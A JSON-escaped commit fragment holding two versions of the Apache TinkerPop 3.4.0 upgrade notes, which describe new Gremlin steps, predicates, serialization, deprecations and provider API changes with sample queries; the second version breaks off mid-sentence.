link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1518[TINKERPOP-1518]\n\n===== Configuring Interface\n\nThere were some changes to interfaces that were related to `Step`. A new `Configuring` interface was added that was\nhelpful in the implementation of the `with()`-step modulator. This new interface extends the `Parameterizing` interface\n(which moved to the `org.apache.tinkerpop.gremlin.process.traversal.step` package with the other step interfaces) and\nin turn is extended by the `Mutating` interface. Making this change meant that the `Mutating.addPropertyMutations()`\nmethod could be removed in favor of the new `Configuring.configure()` method.\n\nAll of the changes above basically mean that if the `Mutating` interface was being used in prior versions, the\n`addPropertyMutations()` method simply needs to be changed to `configure()`.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1975[TINKERPOP-1975]\n\n===== OptionsStrategy\n\n`OptionsStrategy` is a `TraversalStrategy` that makes it possible for users to set arbitrary configurations on a\n`Traversal`. These configurations can be used by graph providers to allow for traversal-level configurations to be\naccessible to their custom steps. 
A user would write something like:\n\n[source,java]\n----\ng.withStrategies(OptionsStrategy.build().with(\"specialLimit\", 10000).create()).V();\n----\n\nThe `OptionsStrategy` is really only the carrier for the configurations and while users can choose to utilize that\nmore verbose method for constructing it shown above, it is more elegantly constructed as follows using `with()`-step:\n\n[source,java]\n----\ng.with(\"specialLimit\", 10000).V();\n----\n\nThe graph provider could then access that value of \"specialLimit\" in their custom step (or elsewhere) as follows:\n\n[source,java]\n----\nOptionsStrategy strategy = this.getTraversal().asAdmin().getStrategies().getStrategy(OptionsStrategy.class).get();\nint specialLimit = (int) strategy.getOptions().get(\"specialLimit\");\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2053[TINKERPOP-2053]\n\n===== Removed hadoop-gremlin Test Artifact\n\nThe `hadoop-gremlin` module no longer generates a test jar that can be used as a test dependency in other modules.\nGenerally speaking, that approach tends to be a bad practice and can cause build problems with Maven that aren't always\nobvious to troubleshoot. With the removal of `giraph-gremlin` for 3.4.0, it seemed even less useful to have this\ntest artifact present. All tests are still present. The following provides a basic summary of how this refactoring\noccurred:\n\n* A new `AbstractFileGraphProvider` was created in `gremlin-test` which provided a lot of the features that\n`HadoopGraphProvider` was exposing. Both `HadoopGraphProvider` and `SparkHadoopGraphProvider` extend from that class\nnow.\n* `ToyIoRegistry` and related classes were moved to `gremlin-test`.\n* The various tests that validated capabilities of `Storage` have been moved to `spark-gremlin` and are part of those\ntests now. Obviously, that makes those tests specific to Spark testing now. If that location creates a problem for some\nreason, that decision can be revisited at some point.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1410[TINKERPOP-1410]\n\n===== TraversalEngine Moved\n\nThe `TraversalEngine` interface was deprecated in 3.2.0 along with all related methods that used it and classes that\nimplemented it. It was replaced by the `Computer` interface and provided a much nicer way to plug different\nimplementations of `Computer` into a traversal. `TraversalEngine` was never wholly removed, however, as it had some deep\ndependencies in the inner workings of the test suite. That infrastructure has largely remained as is until now.\n\nAs of 3.4.0, `TraversalEngine` is no longer in `gremlin-core` and can instead be found in `gremlin-test` as it is\neffectively a \"test-only\" component and serves no other real function. As explained in the javadocs going back to\n3.2.0, providers should implement the `Computer` class and use that instead. At this point, graph providers should have\nlong ago moved to the `Computer` infrastructure as methods for constructing a `TraversalSource` with a\n`TraversalEngine` were long ago removed.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1143[TINKERPOP-1143]\n\n===== Upsert Graph Feature\n\nSome `Graph` implementations may be able to offer upsert functionality for vertices and edges, which can help improve\nusability and performance. To help make it clear to users that a graph operates in this fashion, the `supportsUpsert()`\nfeature has been added to both `Graph.VertexFeatures` and `Graph.EdgeFeatures`. 
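A provider opting in would override the corresponding feature method in its own features implementation; a hypothetical sketch (`MyVertexFeatures` is an illustrative name, not a TinkerPop class):\n\n[source,java]\n----\nimport org.apache.tinkerpop.gremlin.structure.Graph;\n\npublic class MyVertexFeatures implements Graph.Features.VertexFeatures {\n @Override\n public boolean supportsUpsert() {\n return true; \/\/ addV() is then expected to insert-or-update per the provider's identity rules\n }\n}\n----\n\n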
By default, both of these methods will\nreturn `false`.\n\nShould a provider wish to support this feature, the behavior of `addV()` and\/or `addE()` should change such that when\na vertex or edge with the same identifier is provided, the respective step will insert the new element if that value\nis not present or update an existing element if it is found. The method by which the provider \"identifies\" an element\nis completely up to the capabilities of that provider. In the simplest fashion, a graph could simply check the\nvalue of the supplied `T.id`; however, graphs that support some form of schema will likely have other methods for\ndetermining whether or not an existing element is present.\n\nThe extent to which TinkerPop tests \"upsert\" is fairly narrow. Graph providers that choose to support this feature\nshould consider their own test suites carefully to ensure appropriate coverage.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1685[TINKERPOP-1685]\n\n===== TypeTranslator Changes\n\nThe `TypeTranslator` experienced a change in its API and `GroovyTranslator` a change in expectations.\n\n`TypeTranslator` now implements `BiFunction` and takes the graph traversal source name as an argument along with the\nobject to translate. This interface is implemented by default for Groovy with `GroovyTranslator.DefaultTypeTranslator`\nwhich encapsulates all the functionality of what `GroovyTranslator` formerly did by default. To provide customized\ntranslation, simply extend the `DefaultTypeTranslator` and override the methods.\n\n`GroovyTranslator` now expects that the `TypeTranslator` provided to it as part of its `of()` static method overload\nis \"complete\" - i.e. that it provides all the functionality to translate the types passed to it. Thus, a \"complete\"\n`TypeTranslator` is one that does everything that `DefaultTypeTranslator` does as a minimum requirement. Therefore,\nthe extension model described above is the easiest way to get going with a custom `TypeTranslator` approach.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2072[TINKERPOP-2072]\n\n==== Graph Driver Providers\n\n===== Deprecation Removal in RemoteConnection\n\nThe two deprecated synchronous `submit()` methods on the `RemoteConnection` interface have been removed, which means\nthat `RemoteConnection` implementations will need to implement `submitAsync(Bytecode)` if they have not already done\nso.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2103[TINKERPOP-2103]\n","old_contents":"\/\/\/\/\nLicensed to the Apache Software Foundation (ASF) under one or more\ncontributor license agreements. See the NOTICE file distributed with\nthis work for additional information regarding copyright ownership.\nThe ASF licenses this file to You under the Apache License, Version 2.0\n(the \"License\"); you may not use this file except in compliance with\nthe License. 
You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\/\/\/\/\n\n= TinkerPop 3.4.0\n\nimage::https:\/\/raw.githubusercontent.com\/apache\/tinkerpop\/master\/docs\/static\/images\/avant-gremlin.png[width=225]\n\n*Avant-Gremlin Construction #3 for Theremin and Flowers*\n\n== TinkerPop 3.4.0\n\n*Release Date: January 2, 2019*\n\nPlease see the link:https:\/\/github.com\/apache\/tinkerpop\/blob\/3.4.0\/CHANGELOG.asciidoc#release-3-4-0[changelog] for a complete list of all the modifications that are part of this release.\n\n=== Upgrading for Users\n\n==== Gremlin.NET Driver Improvements\n\nThe Gremlin.NET driver now uses request pipelining. This allows connections to be reused for different requests in parallel which should lead to better utilization of connections.\nThe `ConnectionPool` now also has a fixed size whereas it could previously create an unlimited number of connections.\nEach `Connection` can handle up to `MaxInProcessPerConnection` requests in parallel.\nIf this limit is reached for all connections, then a `NoConnectionAvailableException` is thrown which makes this a breaking change.\n\nThese settings can be set as properties on the `ConnectionPoolSettings` instance that can be passed to the `GremlinClient`.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1774[TINKERPOP-1774],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1775[TINKERPOP-1775],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/reference\/#_connection_pool[Reference Documentation]\n\n==== Indexing of collections\n\nTinkerPop 3.4.0 adds a new `index()`-step, which allows users to transform simple collections into index collections or maps.\n\n```\ngremlin> g.V().hasLabel(\"software\").values(\"name\").fold().\n......1> order(local).\n......2> index().unfold()\n==>[lop,0]\n==>[ripple,1]\ngremlin> g.V().hasLabel(\"person\").values(\"name\").fold().\n......1> order(local).by(decr).\n......2> index().\n......3> with(WithOptions.indexer, WithOptions.map)\n==>[0:vadas,1:peter,2:marko,3:josh]\n```\n\n==== Modulation of valueMap()\n\nThe `valueMap()` step now supports `by` and `with` modulation, which also led to the deprecation of `valueMap(true)` overloads.\n\n===== by() Modulation\n\nWith the help of the `by()` modulator `valueMap()` result values can now be adjusted, which is particularly useful to turn multi-\/list-values into single values.\n\n```\ngremlin> g.V().hasLabel(\"person\").valueMap()\n==>[name:[marko],age:[29]]\n==>[name:[vadas],age:[27]]\n==>[name:[josh],age:[32]]\n==>[name:[peter],age:[35]]\ngremlin> g.V().hasLabel(\"person\").valueMap().by(unfold())\n==>[name:marko,age:29]\n==>[name:vadas,age:27]\n==>[name:josh,age:32]\n==>[name:peter,age:35]\n```\n===== with() Modulation\n\nThe `with()` modulator can be used to include certain tokens (`id`, `label`, `key` and\/or `value`).\n\nThe old way (still valid, but deprecated):\n\n```\ngremlin> g.V().hasLabel(\"software\").valueMap(true)\n==>[id:10,label:software,name:[gremlin]]\n==>[id:11,label:software,name:[tinkergraph]]\ngremlin> g.V().has(\"person\",\"name\",\"marko\").properties(\"location\").valueMap(true)\n==>[id:6,key:location,value:san 
diego,startTime:1997,endTime:2001]\n==>[id:7,key:location,value:santa cruz,startTime:2001,endTime:2004]\n==>[id:8,key:location,value:brussels,startTime:2004,endTime:2005]\n==>[id:9,key:location,value:santa fe,startTime:2005]\n```\n\nThe new way:\n\n```\ngremlin> g.V().hasLabel(\"software\").valueMap().with(WithOptions.tokens)\n==>[id:10,label:software,name:[gremlin]]\n==>[id:11,label:software,name:[tinkergraph]]\ngremlin> g.V().has(\"person\",\"name\",\"marko\").properties(\"location\").valueMap().with(WithOptions.tokens)\n==>[id:6,key:location,value:san diego,startTime:1997,endTime:2001]\n==>[id:7,key:location,value:santa cruz,startTime:2001,endTime:2004]\n==>[id:8,key:location,value:brussels,startTime:2004,endTime:2005]\n==>[id:9,key:location,value:santa fe,startTime:2005]\n```\n\nFurthermore, now there's a finer control over which of the tokens should be included:\n\n```\ngremlin> g.V().hasLabel(\"software\").valueMap().with(WithOptions.tokens, WithOptions.labels)\n==>[label:software,name:[gremlin]]\n==>[label:software,name:[tinkergraph]]\ngremlin> g.V().has(\"person\",\"name\",\"marko\").properties(\"location\").valueMap().with(WithOptions.tokens, WithOptions.values)\n==>[value:san diego,startTime:1997,endTime:2001]\n==>[value:santa cruz,startTime:2001,endTime:2004]\n==>[value:brussels,startTime:2004,endTime:2005]\n==>[value:santa fe,startTime:2005]\n```\n\nAs shown above, the support of the `with()` modulator for `valueMap()` makes the `valueMap(boolean)` overload\nsuperfluous, hence this overload is now deprecated. This is a breaking API change, since `valueMap()` will now always\nyield instances of type `Map<Object, Object>`. Prior this change only the `valueMap(boolean)` overload yielded\n`Map<Object, Object>` objects, `valueMap()` without the boolean parameter used to yield instances of type\n`Map<String, Object>`.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2059[TINKERPOP-2059]\n\n==== Number Comparison of Predicates\n\nIn previous versions `within()` and `without()` performed strict number comparisons; that means these predicates did\nnot only compare number values, but also the type. This was inconsistent with how other predicates (like `eq, `gt`,\netc.) work. All predicates will now ignore the number type and instead compare numbers only based on their value.\n\nOld behavior:\n\n```\ngremlin> g.V().has(\"age\", eq(32L))\n==>v[4]\ngremlin> g.V().has(\"age\", within(32L, 35L))\ngremlin>\n```\n\nNew behavior:\n\n```\ngremlin> g.V().has(\"age\", eq(32L))\n==>v[4]\ngremlin> g.V().has(\"age\", within(32L, 35L))\n==>v[4]\n==>v[6]\n```\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2058[TINKERPOP-2058]\n\n==== ReferenceElementStrategy\n\nGremlin Server has had some inconsistent behavior in the serialization of the results it returns. Remote traversals\nbased on Gremlin bytecode always detach returned graph elements to \"reference\" (i.e. removes properties and only\ninclude the `id` and `label`), but scripts would detach graph elements and include the properties. 
For 3.4.0,\nTinkerPop introduces the `ReferenceElementStrategy` which can be configured on a `GraphTraversalSource` to always\ndetach to \"reference\".\n\n[source,text]\n----\ngremlin> graph = TinkerFactory.createModern()\n==>tinkergraph[vertices:6 edges:6]\ngremlin> g = graph.traversal().withStrategies(ReferenceElementStrategy.instance())\n==>graphtraversalsource[tinkergraph[vertices:6 edges:6], standard]\ngremlin> v = g.V().has('person','name','marko').next()\n==>v[1]\ngremlin> v.class\n==>class org.apache.tinkerpop.gremlin.structure.util.reference.ReferenceVertex\ngremlin> v.properties()\ngremlin>\n----\n\nThe packaged initialization scripts that come with Gremlin Server now pre-configure the sample graphs with this\nstrategy to ensure that both scripts and bytecode based requests over any protocol (HTTP, websocket, etc) and\nserialization format all return a \"reference\". To revert to the old form, simply remove the strategy in the\ninitialization script.\n\nIt is recommended that users choose to configure their `GraphTraversalSource` instances with `ReferenceElementStrategy`\nas working with \"references\" only is the recommended method for developing applications with TinkerPop. In the future,\nit is possible that `ReferenceElementStrategy` will be configured by default for all graphs on or off Gremlin Server,\nso it would be best to start utilizing it now and grooming existing Gremlin and related application code to account\nfor it.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2075[TINKERPOP-2075]\n\n==== Added Text Predicates\n\nGremlin now supports simple text predicates on top of the existing `P` predicates. Both, the new `TextP` text\npredicates and the old `P` predicates, can be chained using `and()` and `or()`.\n\n[source,groovy]\n----\ngremlin> g.V().has(\"person\",\"name\", containing(\"o\")).valueMap()\n==>[name:[marko],age:[29]]\n==>[name:[josh],age:[32]]\ngremlin> g.V().has(\"person\",\"name\", containing(\"o\").and(gte(\"j\").and(endingWith(\"ko\")))).valueMap()\n==>[name:[marko],age:[29]]\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2041[TINKERPOP-2041]\n\n==== Removed groovy-sql Dependency\n\nGremlin Console and Gremlin Server no longer include groovy-sql. If you depend on groovy-sql,\nyou can install it in Gremlin Console or Gremlin Server using the plugin system.\n\nConsole:\n```\n:install org.codehaus.groovy groovy-sql 2.5.2\n```\n\nServer:\n```\nbin\/gremlin-server.sh install org.codehaus.groovy groovy-sql 2.5.2\n```\n\nIf your project depended on groovy-sql transitively, simply include it in your project's build file (e.g. 
maven: pom.xml).\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2037[TINKERPOP-2037]\n\n==== Changed Infix Behavior\n\nThe infix notation of `and()` and `or()` now supports an arbitrary number of traversals and `ConnectiveStrategy`\nproduces a traversal with proper AND and OR semantics.\n\n```\nInput: a.or.b.and.c.or.d.and.e.or.f.and.g.and.h.or.i\n\n*BEFORE*\nOutput: or(a, or(and(b, c), or(and(d, e), or(and(and(f, g), h), i))))\n\n*NOW*\nOutput: or(a, and(b, c), and(d, e), and(f, g, h), i)\n```\n\nFurthermore, previous versions failed to apply 3 or more `and()` steps using the infix notation, this is now fixed.\n\n[source,groovy]\n----\ngremlin> g.V().has(\"name\",\"marko\").and().has(\"age\", lt(30)).or().has(\"name\",\"josh\").and().has(\"age\", gt(30)).and().out(\"created\")\n==>v[1]\n==>v[4]\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2029[TINKERPOP-2029]\n\n==== sparql-gremlin\n\nThe `sparql-gremlin` module is a link:https:\/\/en.wikipedia.org\/wiki\/SPARQL[SPARQL] to Gremlin compiler, which allows\nSPARQL to be executed over any TinkerPop-enabled graph system.\n\n[source,groovy]\n----\ngraph = TinkerFactory.createModern()\ng = graph.traversal(SparqlTraversalSource)\ng.sparql(\"\"\"SELECT ?name ?age\n WHERE { ?person v:name ?name . ?person v:age ?age }\n ORDER BY ASC(?age)\"\"\")\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1878[TINKERPOP-1878],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/reference\/#sparql-gremlin[Reference Documentation]\n\n==== GraphBinary\n\nGraphBinary is a new language agnostic, network serialization format designed to replace Gryo and GraphSON. At this\ntime it is only available on the JVM, but support will be added for other languages in upcoming releases. The\nserializer has been configured in Gremlin Server's packaged configuration files. The serializer can be configured\nusing the Java driver as follows:\n\n[source,java]\n----\nCluster cluster = Cluster.build(\"localhost\").port(8182).\n serializer(Serializers.GRAPHBINARY_V1D0).create();\nClient client = cluster.connect();\nList<Result> r = client.submit(\"g.V().has('person','name','marko')\").all().join();\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1942[TINKERPOP-1942],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/dev\/io\/#graphbinary[IO Documentation]\n\n==== Status Attributes\n\nThe Gremlin Server protocol allows for status attributes to be returned in responses. These attributes were typically\nfor internal use, but were designed with extensibility in mind so that providers could place return their own\nattributes to calling clients. Unfortunately, unless the client was being used with protocol level requests (which\nwasn't convenient) those attributes were essentially hidden from view. As of this version however, status attributes\nare fully retrievable for both successful requests and exceptions.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1913[TINKERPOP-1913]\n\n==== with() Step\n\nThis version of TinkerPop introduces the `with()`-step to Gremlin. It isn't really a step but is instead a step\nmodulator. This modulator allows the step it is modifying to accept configurations that can be used to alter the\nbehavior of the step itself. 
A good example of its usage is shown with the revised syntax of the `pageRank()`-step\nwhich now uses `with()` to replace the old `by()` options:\n\n[source,groovy]\n----\ng.V().hasLabel('person').\n pageRank().\n with(PageRank.edges, __.outE('knows')).\n with(PageRank.propertyName, 'friendRank').\n order().\n by('friendRank',desc).\n valueMap('name','friendRank')\n----\n\nA similar change was made for `peerPressure()`-step:\n\n[source,groovy]\n----\ng.V().hasLabel('person').\n peerPressure().\n with(PeerPressure.propertyName, 'cluster').\n group().\n by('cluster').\n by('name')\n----\n\nNote that the `by()` modulators still work, but should be considered deprecated and open for removal in a future\nrelease where breaking changes are allowed.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1975[TINKERPOP-1975],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/reference\/#with-step[Reference Documentation]\n\n==== shortestPath() Step\n\nCalculating the link:https:\/\/en.wikipedia.org\/wiki\/Shortest_path_problem[shortest path] between vertices is a common\ngraph use case. While the traversal to determine a shortest path can be expressed in Gremlin, this particular problem\nis common enough that the feature has been encapsulated into its own step, demonstrated as follows:\n\n[source,text]\n----\ngremlin> g.withComputer().V().has('name','marko').\n......1> shortestPath().with(ShortestPath.target, has('name','peter'))\n==>[v[1],v[3],v[6]]\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1990[TINKERPOP-1990],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/reference\/#shortestpath-step[Reference Documentation]\n\n==== connectedComponent() Step\n\nIn prior versions of TinkerPop, it was recommended that the identification of\nlink:https:\/\/en.wikipedia.org\/wiki\/Connected_component_(graph_theory)[Connected Component] instances in a graph be\ncomputed by way of a reasonably complex bit of Gremlin that looked something like this:\n\n[source,groovy]\n----\ng.V().emit(cyclicPath().or().not(both())).repeat(both()).until(cyclicPath()).\n path().aggregate(\"p\").\n unfold().dedup().\n map(__.as(\"v\").select(\"p\").unfold().\n filter(unfold().where(eq(\"v\"))).\n unfold().dedup().order().by(id).fold()).\n dedup()\n----\n\nThe above approach had a number of drawbacks that included a large execution cost as well as incompatibilities in OLAP.\nTo simplify usage of this commonly used graph algorithm, TinkerPop 3.4.0 introduces the `connectedComponent()` step\nwhich reduces the above operation to:\n\n[source,groovy]\n----\ng.withComputer().V().connectedComponent()\n----\n\nIt is important to note that this step does require the use of a `GraphComputer` to work, as it utilizes a\n`VertexProgram` behind the scenes.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1967[TINKERPOP-1967],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/reference\/#connectedcomponent-step[Reference Documentation]\n\n==== io() Step\n\nThere have been some important changes to IO operations for reading and writing graph data. 
The use of `Graph.io()`\nhas been deprecated to further remove dependence on the Graph (Structure) API for users and to extend these basic\noperations to GLV users by making these features available as part of the Gremlin language.\n\nIt is now possible to simply use Gremlin:\n\n[source,groovy]\n----\ngraph = ...\ng = graph.traversal()\ng.io(someInputFile).read().iterate()\ng.io(someOutputFile).write().iterate()\n----\n\nWhile `io()`-step is still single-threaded for OLTP-style loading, it can be utilized in conjunction with OLAP, which\ninternally uses `CloneVertexProgram`, and therefore any graph `InputFormat` or `OutputFormat` can be configured in\nconjunction with this step for parallel loads of large datasets.\n\nIt is also worth noting that the `io()`-step may be overridden by graph providers to utilize their native bulk-loading\nfeatures, so consult the documentation of the implementation being used to determine if there are any improved\nefficiencies there.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1996[TINKERPOP-1996],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/reference\/#io-step[Reference Documentation]\n\n==== Per Request Options\n\nThe Java driver now allows for various options to be set on a per-request basis via new overloads to `submit()` that\naccept `RequestOptions` instances. A good use-case for this feature is to set a per-request override to the\n`scriptEvaluationTimeout` so that it only applies to the current request.\n\n[source,java]\n----\nCluster cluster = Cluster.open();\nClient client = cluster.connect();\nRequestOptions options = RequestOptions.build().timeout(500).create();\nList<Result> result = client.submit(\"g.V()\", options).all().get();\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1342[TINKERPOP-1342]\n\n==== Moving of RemoteGraph\n\n`RemoteGraph` was long ago deprecated in favor of `withRemote()`. It became even less useful with the introduction of\nthe `AnonymousTraversalSource` concept in 3.3.5. Its only real use was for testing remote bytecode-based traversals\nin the test suite as the test suite requires an actual `Graph` object to function properly. As such, `RemoteGraph` has\nbeen moved to `gremlin-test`. It should no longer be used in any capacity besides that.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2079[TINKERPOP-2079]\n\n==== Removal of Giraph Support\n\nSupport for Giraph has been removed as of this version. There were a number of reasons for this decision which were\ndiscussed in the community prior to taking this step. Users should switch to Spark for their OLAP-based graph-computing\nneeds.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1930[TINKERPOP-1930]\n\n==== Removal of Rebindings Options\n\nThe \"rebindings\" option is no longer supported for clients. It was deprecated long ago at 3.1.0. The server will not\nrespond to it on any channel - websockets, nio or HTTP. Use the \"aliases\" option instead.\n\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1705[TINKERPOP-1705]\n\n==== gremlin-server.sh -i Removal\n\nThe `-i` option for installing dependencies in Gremlin Server was long ago deprecated and has now been removed. Please\nuse `install` as its replacement going forward.\n\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2031[TINKERPOP-2031]\n\n==== Improvements in `min()` and `max()`\n\nPreviously `min()` and `max()` only worked for numeric values. 
This has been changed and these steps can now\noperate over any `Comparable` value. The common workaround was the combination of `order().by()` and `limit()` as\nshown here:\n\n[source,groovy]\n----\ngremlin> g.V().values('name').order().by().limit(1) \/\/ workaround for min()\n==>josh\ngremlin> g.V().values('name').order().by(decr).limit(1) \/\/ workaround for max()\n==>vadas\n----\n\nAny attempt to use `min()` or `max()` on non-numeric values led to an exception:\n\n[source,groovy]\n----\ngremlin> g.V().values('name').min()\njava.lang.String cannot be cast to java.lang.Number\nType ':help' or ':h' for help.\nDisplay stack trace? [yN]\n----\n\nWith the changes in this release, these kinds of queries became a lot easier:\n\n[source,groovy]\n----\ngremlin> g.V().values('name').min()\n==>josh\ngremlin> g.V().values('name').max()\n==>vadas\n----\n\n==== Nested Loop Support\n\nTraversals now support nesting of `repeat()` loops.\n\nThese can now be used to repeat another traversal while in a looped context, either inside the body of a `repeat()` or\nin its step modifiers (`until()` or `emit()`).\n\n[source,groovy]\n----\ngremlin> g.V().repeat(__.in('traverses').repeat(__.in('develops')).emit()).emit().values('name')\n==>stephen\n==>matthias\n==>marko\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-967[TINKERPOP-967]\n\n==== EventStrategy API\n\nThere were some minor modifications to how `EventStrategy` is constructed and what can be expected from events raised\nfrom the addition of new properties.\n\nWith respect to the change in terms of `EventStrategy` construction, the `detach()` builder method formerly took a\n`Class` as an argument and that `Class` was meant to be one of the various \"detachment factories\" or `null`. That\napproach was a bit confusing, so that signature has changed to `detach(EventStrategy.Detachment)` where the argument\nis a more handy enum of detachment options.\n\nAs for the changes related to events themselves, it is first worth noting that the previously deprecated\n`vertexPropertyChanged(Vertex, Property, Object, Object...)` on `MutationListener` has been removed for what should\nhave originally been the correct signature of `vertexPropertyChanged(Vertex, VertexProperty, Object, Object...)`. In\nprior versions when this method and its related `edgePropertyChanged()` and `vertexPropertyPropertyChanged()` were\ntriggered by way of the addition of a new property, a \"fake\" property was included with a `null` value for the\n\"oldValue\" argument to these methods (as it did not exist prior to this event). That was a bit awkward to reason about\nwhen dealing with that event. 
To make this easier, the event now raises with a `KeyedVertexProperty` or\n`KeyedProperty` instance, which only contains a property key and no value in them.\n\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1831[TINKERPOP-1831]\n\n==== Deprecation Removal\n\nThe following deprecated classes, methods or fields have been removed in this version:\n\n* `gremlin-core`\n** `org.apache.tinkerpop.gremlin.jsr223.ImportCustomizer#GREMLIN_CORE`\n** `org.apache.tinkerpop.gremlin.process.remote.RemoteGraph` - moved to `gremlin-test`\n** `org.apache.tinkerpop.gremlin.process.remote.RemoteConnection.submit(Traversal)`\n** `org.apache.tinkerpop.gremlin.process.remote.RemoteConnection.submit(Bytecode)`\n** `org.apache.tinkerpop.gremlin.process.remote.traversal.strategy.decoration.RemoteStrategy#identity()`\n** `org.apache.tinkerpop.gremlin.process.traversal.TraversalEngine`\n** `org.apache.tinkerpop.gremlin.process.traversal.engine.*`\n** `org.apache.tinkerpop.gremlin.process.traversal.strategy.decoration.PartitionStrategy.Builder#addReadPartition(String)`\n** `org.apache.tinkerpop.gremlin.process.traversal.strategy.decoration.SubgraphStrategy.Builder#edgeCriterion(Traversal)`\n** `org.apache.tinkerpop.gremlin.process.traversal.strategy.decoration.SubgraphStrategy.Builder#vertexCriterion(Traversal)`\n** `org.apache.tinkerpop.gremlin.process.traversal.step.map.LambdaCollectingBarrierStep.Consumers`\n** `org.apache.tinkerpop.gremlin.process.traversal.step.util.HasContainer#makeHasContainers(String, P)`\n** `org.apache.tinkerpop.gremlin.process.traversal.step.util.event.MutationListener#vertexPropertyChanged(Vertex, Property, Object, Object...)`\n** `org.apache.tinkerpop.gremlin.structure.Element.Exceptions#elementAlreadyRemoved(Class, Object)`\n** `org.apache.tinkerpop.gremlin.structure.Graph.Exceptions#elementNotFound(Class, Object)`\n** `org.apache.tinkerpop.gremlin.structure.Graph.Exceptions#elementNotFound(Class, Object, Exception)`\n* `gremlin-driver`\n** `org.apache.tinkerpop.gremlin.driver.Client#rebind(String)`\n** `org.apache.tinkerpop.gremlin.driver.Client.ReboundClusterdClient`\n** `org.apache.tinkerpop.gremlin.driver.Tokens#ARGS_REBINDINGS`\n* `gremlin-groovy`\n** `org.apache.tinkerpop.gremlin.groovy.jsr223.GremlinGroovyScriptEngine.close()` - no longer implements `AutoCloseable`\n* `gremlin-server`\n** `org.apache.tinkerpop.gremlin.server.GraphManager#getGraphs()`\n** `org.apache.tinkerpop.gremlin.server.GraphManager#getTraversalSources()`\n** `org.apache.tinkerpop.gremlin.server.Settings#serializedResponseTimeout`\n** `org.apache.tinkerpop.gremlin.server.Settings.AuthenticationSettings#className`\n** `org.apache.tinkerpop.gremlin.server.handler.OpSelectorHandler(Settings, GraphManager, GremlinExecutor, ScheduledExecutorService)`\n** `org.apache.tinkerpop.gremlin.server.op.AbstractOpProcessor#makeFrame(ChannelHandlerContext, RequestMessage, MessageSerializer serializer, boolean, List, ResponseStatusCode code)`\n* `hadoop-graph`\n** `org.apache.tinkerpop.gremlin.hadoop.structure.HadoopConfiguration#getGraphInputFormat()`\n** `org.apache.tinkerpop.gremlin.hadoop.structure.HadoopConfiguration#getGraphOutputFormat()`\n\nPlease see the javadoc deprecation notes or upgrade documentation specific to when the deprecation took place to\nunderstand how to resolve this breaking change.\n\nSee: 
link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1143[TINKERPOP-1143],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1296[TINKERPOP-1296],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1705[TINKERPOP-1705],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1707[TINKERPOP-1707],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1954[TINKERPOP-1954],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1986[TINKERPOP-1986],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2079[TINKERPOP-2079],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2103[TINKERPOP-2103]\n\n==== Deprecated GraphSONMessageSerializerGremlinV2d0\n\nThe `GraphSONMessageSerializerGremlinV2d0` serializer is now analogous to `GraphSONMessageSerializerV2d0` and therefore\nredundant. It has technically always been equivalent in terms of functionality as both serialized to the same format\n(i.e. GraphSON 2.0 with embedded types). It is no longer clear why these two classes were established this way, but\nit does carry the negative effect where multiple serializer versions could not be bound to Gremlin Server's HTTP\nendpoint as the MIME types 